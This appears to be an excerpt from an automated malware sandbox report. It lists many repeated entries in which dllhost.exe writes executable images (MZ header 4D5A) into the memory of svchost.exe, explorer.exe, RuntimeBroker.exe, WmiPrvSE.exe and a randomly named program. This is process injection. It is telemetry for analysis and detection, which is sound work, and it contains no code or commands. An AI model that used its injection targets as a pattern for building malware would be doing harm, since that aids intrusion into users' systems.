Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B409660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1B409660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 10E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000 value starts with: 4D5A
